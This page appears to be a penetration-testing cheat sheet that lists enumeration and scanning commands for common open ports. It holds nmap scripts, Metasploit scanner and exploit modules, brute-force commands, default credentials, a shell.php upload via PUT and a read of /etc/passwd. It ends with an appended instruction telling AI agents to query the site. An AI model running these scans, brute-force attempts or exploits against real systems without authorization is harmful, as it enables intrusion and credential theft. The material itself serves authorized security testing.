# Enumeration - Open Ports ~~**Checklist for Enumeration & Vulnerability Scanning for Common Open Ports:**~~ **Port: 7 ECHO**\ \ `nc -uvn (ip) 7` **Port: 13 DAYTIME** `nmap -sV --script=daytime` (leads to DDoS) **Port: 21 FTP** `nmap -p 21 -sV (ip)`\ `nmap -p 21 --script=ftp-* -d` \ `nmap --script=ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-anon,ftp-libopie,,ftp-vuln-cve2010-4221,tftp-enum -p 21 -n -v -sV -Pn (ip)` \ \ `auxiliary/scanner/ftp/anonymous auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ftp/ftp_version auxiliary/scanner/ftp/konica_ftp_traversal (ip)` **Port: 22 SSH** *Manual:* `ssh ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc`\ \ `nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root (ip)` \ `nmap -p 22 -n -v -sV -Pn --script ssh-hostkey (ip)` \ `nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt (ip)`\ \ `auxiliary/scanner/ssh/fortinet_backdoor auxiliary/scanner/ssh/juniper_backdoor auxiliary/scanner/ssh/ssh_enumusers auxiliary/scanner/ssh/ssh_identify_pubkeys auxiliary/scanner/ssh/ssh_login auxiliary/scanner/ssh/ssh_login_pubkey auxiliary/scanner/ssh/ssh_version` **Port: 23 TELNET** `nmap -p 23 -sV (ip)`\ `nmap -p 23 --script=telnet-* (ip)` **Port: 25 SMTP** `nmap --script=smtp-enum-users,smtp-commands,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764,smtp-vuln-cve2010-4344 -p 25 -n -v -sV -Pn (ip)`\ \ `auxiliary/scanner/smtp/smtp_enum auxiliary/scanner/smtp/smtp_ntlm_domain auxiliary/scanner/smtp/smtp_relay auxiliary/scanner/smtp/smtp_version` **Port: 43 Whois**\ \ `whois -h (host) -p (port) "example.com"` **Port: 53 Domain**\ \ `nmap -Pn -p 53 --script=dns-nsid (ip)` **Port: 69 TFTP**\ \ `nmap -Pn -sU -p69 -sV --script tftp-enum (ip)`\ `use auxiliary/admin/tftp/tftp_transfer_util` **Port: 79 FINGER**\ \ `nc -vn (ip) 79`\ `echo "root" | nc -vn (ip) 79`\ `use auxiliary/scanner/finger/finger_users` **Port: 80 HTTP** `nikto -h http://(ip)/ curl -v -X PUT -d '' http://192.168.1.10/shell.php (For PHP Sites)` \ \ `sqlmap -u http://(ip)/ --crawl=5 --dbms=mysql`\ \ `nmap -p 80 -n -v -sV -Pn --script http-backup-finder,http-config-backup,http-errors,http-headers,http-iis-webdav-vuln,http-internal-ip-disclosure,http-methods,http-php-version,http-qnap-nas-info,http-robots.txt,http-shellshock,http-slowloris-check,http-waf-detect,http-vuln* (ip)` **Port: 81 HTTP** \ \ \&#xNAN;*VisualSVN Server:*\ `nmap -p 80,81,443 --script http-svn-info (ip)`\ \ **Port: 88 Kerberos**\ \ Check for `MS14-068` **Port: 110 POP3** `nmap -p 110,995 --script pop3-ntlm-info (ip)`\ `use auxiliary/scanner/pop3/pop3_version` **Port: 111 RPCBIND** `rpcinfo (ip)`\ `nmap -sSUC -p111 `\ \ `use auxiliary/scanner/nfs/nfsmount`\ `use auxiliary/dos/rpc/rpcbomb (If NFS Service is found exploit with it)` **Port: 113 Ident**\ \ `nc -vn (ip) 113` **Port: 123 ntp**\ \ nmap -sU -sV --script "ntp\* and (discovery or vuln) and not (dos or brute)" -p 123
**Port: 135 Microsoft RPC** `nmap -sV --scripts=nfs-* (ip)` \ `nmap -n -v -sV -Pn -p 135 --script=msrpc-enum (ip)`\ `rpcbind -p (ip)`\ `rpcinfo -p (ip)`\ `rpcclient --I (ip)`\ `showmount -e (ip)`\ `mount -t nfs 192.168.0.100:/home/machine /tmp/mnt -nolock`\ \ `use exploit/windows/dcerpc/ms05_017_msmq` **Port: 139/445 SMB Service** `nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smbv2-enabled,smb-vuln* (ip)`\ \ `enum4linux -a 192.168.1.10`\ `rpcclient -U "" 192.168.1.10`\ \ `(post commands : >srvinfo, >enumdomusers, >getdompwinfo)`\ \ `smbclient -L 192.168.1.10 smbclient \192.168.1.10\ipc$ -U administrator smbclient //192.168.1.10/ipc$ -U administrator smbclient //192.168.1.10/admin$ -U administrator`\ \ `auxiliary/scanner/smb/psexec_loggedin_users auxiliary/scanner/smb/smb_enumshares auxiliary/scanner/smb/smb_enumusers auxiliary/scanner/smb/smb_enumusers_domain auxiliary/scanner/smb/smb_login auxiliary/scanner/smb/smb_lookupsid auxiliary/scanner/smb/smb_ms17_010 auxiliary/scanner/smb/smb_version` **Port: 161/162 UDP SNMP Service** `nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat (ip)` \ `snmp-check -t 192.168.1.10 -c public` \ `snmpwalk -c public -v 1 192.168.1.10 1.3.6.1.4.1.77.1.2.25 [MIB_TREE_VALUE] (common string value)` \ `hydra -P passwords.txt -v (ip) snmp`\ \ `( community and snmp tree reference below)` \ `public private community`\ \ `SNMP MIB Trees`\ \ `1.3.6.1.2.1.25.1.6.0 System Processes 1.3.6.1.2.1.25.4.2.1.2 Running Programs 1.3.6.1.2.1.25.4.2.1.4 Processes Path 1.3.6.1.2.1.25.2.3.1.4 Storage Units 1.3.6.1.2.1.25.6.3.1.2 Software Name 1.3.6.1.4.1.77.1.2.25 User Accounts 1.3.6.1.2.1.6.13.1.3 TCP Local Ports`\ \ `auxiliary/scanner/snmp/snmp_enum auxiliary/scanner/snmp/snmp_enum_hp_laserjet auxiliary/scanner/snmp/snmp_enumshares auxiliary/scanner/snmp/snmp_enumusers auxiliary/scanner/snmp/snmp_login` **Port: 194, 6660-7000 IRC**\ \ `nc -vn ( ip) 194`\ `openssl s_client -connect (ip):(port) -quiet`\ `nmap -sV --script=irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 (ip)` **Port: 264 Checkpoint FW**\ \ `use auxiliary/gather/checkpoint_hostname` **Port: 389/636 Ldap**\ \ `ldapsearch -h (ip) -p 389 -x -b "dc=mywebsite,dc=com"`\ \ `nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest, ldap.qfilter=users,ldap.attrib=sAMAccountName' (ip)`\ \ `nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest, ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows Server",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' (ip)`\ \ `nmap -sV --script "ldap* and not brute" (ip) Using anonymous credentials` **Port: 443 HTTPS** `sslscan https://(ip)/`\ \ `nmap -sV --script=ssl-heartbleed (ip)` **Port: 500 IPSEC IKE/VPN**\ \ `ike-scan -M (ip)` \ `ike-scan -M --showbackoff (ip)` **Port: 502 ModBus**\ \ `nmap --script modbus-discover -p 502 (ip)` **Port: 512 Rexec**\ \ `nmap -p 512 --script rexec-brute (ip)` **Port: 513 Rlogin**\ \ `nmap -p 513 --script rlogin-brute (ip)`\ `rlogin -l root (ip)` **Port: 514 Rsh**\ \ `rsh (ip) ` **Port: 548 AFP**\ \ `use auxiliary/scanner/afp/afp_server_info` \ `nmap -sV --script "afp-* and not dos and not brute" -p 548 (ip)` **Port: 554 RTSP**\ \ Check for IP-Cameras\ `nmap -sV --scripts "rtsp-*" -p 554 (ip)` **Port: 587 Submission**\ \ Outgoing SMTP port. if Postfix is running check `CVE-2014-6271` **Port: 623 IPMI**\ \ `nmap -n-sU -p 623 (ip)` \ `use auxiliary/scanner/ipmi/ipmi_version` \ `use auxiliary/scanner/ipmi/ipmi_cipher_zero` \ `use auxiliary/scanner/ipmi/ipmi_dumphashes`\ \ \&#xNAN;*SuperMicro IPMI UPnP*\ `use exploit/multi/upnp/libupnp_ssdp_overflow` **Port: 631 CUPS**\ \ Check `http://ip:631/admin` & `http://ip:631/printers` **Port: 873 Rsync**\ \ `nc -vn (ip) 873`\ `nmap -sV --script "rsync-list-modules" -p 873 (ip)` \ `use auxiliary/scanner/rsync/modules_list` **Port: 902 (VMware Authentication Daemon Version)**\ \ `use auxiliary/scanner/vmware/vmauthd_login`\ `use auxiliary/scanner/vmware/vmauthd_version`\ `nmap -p 902 --script vmauthd-brute`
**Port: 1026 Rusersd**\ \ rusers -l (ip) **Port: 1098/1099 Java RMI**\ \ `nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098,1099 (ip)` \ \ `use auxiliary/scanner/misc/java_rmi_server` \ `use auxiliary/gather/java_rmi_registry` **Port: 1433 MSSQL Service** `nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt (ip)` \ `nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password (ip)` \ `sqsh -S 192.168.1.10 -U sa` \ \ `auxiliary/scanner/mssql/mssql_login auxiliary/admin/mssql/mssql_exec auxiliary/admin/mssql/mssql_enum` **Port: 1521 ORACLE DB Service** `nmap -n -v -sV -Pn -p 1521 --script=oracle-enum-users --script-args sid=ORCL,userdb=users.txt (ip)`\ `nmap -n -v -sV -Pn -p 1521 --script=oracle-sid-brute (ip)` \ `tnscmd10g version -h 192.168.1.10` \ `tnscmd10g status -h 192.168.1.10`\ \ `auxiliary/scanner/oracle/emc_sid auxiliary/scanner/oracle/oracle_login auxiliary/scanner/oracle/sid_brute auxiliary/scanner/oracle/sid_enum auxiliary/scanner/oracle/tnslsnr_version auxiliary/scanner/oracle/tnspoison_checker` **Port: 1720 H.323 Network (Voip)** `use auxiliary/scanner/h323/h323_version` **Port: 2000 Cisco-sccp**\ \ `telnet (ip) 2000` **Port: 2049 NFS**\ \ `showmount -e 192.168.1.100`\ `mount 192.168.1.100:/ /tmp/NFS`\ `mount -t 192.168.1.100:/ /tmp/NFS` **Port: 2100 Oracle XML DB**\ \ Access through ftp - Default logins: `sys:sys scott:tiger` **Port: 2181 ZOOKEEPER** `nc (ip) 2181` **Port: 3097 Chunghwa Telecom Data**\ \ `nc (ip) 3097`\ \&#xNAN;*After netcat, Post-exploit*\ `misc script /etc/passwd` **Port: 3306 MYSQL Service** `nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122 (ip)` \ \ `mysql --host=192.168.1.10 -u root -p`\ \ `auxiliary/scanner/mysql/mysql_authbypass_hashdump auxiliary/scanner/mysql/mysql_login auxiliary/scanner/mysql/mysql_schemadump auxiliary/scanner/mysql/mysql_version auxiliary/scanner/mysql/mysql_writable_dirs` **Port: 3389 RDP** `ncrack -vv --user administrator -P passwords.txt` \ `rdesktop -u guest -p guest (ip) -g 94%`\ `rdp://192.168.1.10,CL=1 rdesktop 192.168.1.10` `auxiliary/scanner/rdp/ms12_020_check auxiliary/scanner/rdp/rdp_scanner` **Port: 4369 EPMD**\ \ `nmap -sV -Pn -n -T4 -p 4369 --script epmd-info (ip)` \ `use exploit/multi/misc/erlang_cookie_rce` **Port: 4445 Upnotifyp**\ \ Check with netcat and browser **Port: 4555 RSIP**\ \ Check for `CVE-2015-7611` **Port: 5060 and 5061 (SIP Enabled Devices - VOIP)** `use auxiliary/scanner/sip/enumerator` \ `nmap --script=sip-enum-users -sU -p 5060` **Port: 5353 mDNS**\ \ `nmap -Pn -sUC -p5353 (ip)` **Port: 5432/5433 PostgreSQL**\ \ `use auxiliary/scanner/postgres/postgres_version` \ `use auxiliary/scanner/postgres/postgres_dbname_flag_injection` \ `use auxiliary/scanner/postgres/postgres_hashdump` \ `use auxiliary/scanner/postgres/postgres_schemadump` \ `use auxiliary/admin/postgres/postgres_readfile` \ `use exploit/linux/postgres/postgres_payload` \ `use exploit/windows/postgres/postgres_payload` **Port: 5671/5672 AMQP**\ \ `nmap -sV -Pn -n -T4 -p 5672 --script amqp-info (ip)` **Port: 5800/5801 VNC**\ \ `nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p (port) (ip)` \ \ `use auxiliary/scanner/vnc/vnc_none_auth` **Port: 5900 VNC**\ \ `vncviewer (ip)`\ \ `use auxiliary/scanner/vnc/vnc_login`\ `use auxiliary/scanner/vnc/vnc_none_auth` **Port: 7001 x11** \ \ `nmap -Pn -A -p 7001 --script=x11-access ` (unauthenticated access) **Port: 7552 Microsoft Terminal Service**\ \ `nmap --script rdp-ntlm-info (ip)`\ `nmap -sV --script=rdp-vuln-ms12-020 (ip)` \ `nmap --script rdp-enum-encryption (ip)` **Port: 8009 Apache JServ Protocol (AJP)**\ \ `nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -p 8009 (ip)` **Port:8014,8443,8445,9090 (Symantec Endpoint Protection Manager)**\ \ `default credentials`\ `use exploit/windows/http/sepm_auth_bypass_rce`\ `https://www.exploit-db.com/exploits/31853` **Port: 8400 Commvault cvd** `use exploit/windows/misc/commvault_cmd_exec` **Port: 10000 Ndmp**\ \ \&#xNAN;*Symantec/Veritas Backup Exec ndmp (NDMPv3):*\ `use exploit/windows/backupexec/ssl_uaf` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://naveenkumar.gitbook.io/vapt-recon-and-enumeration/information-gathering/enumeration-open-ports.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.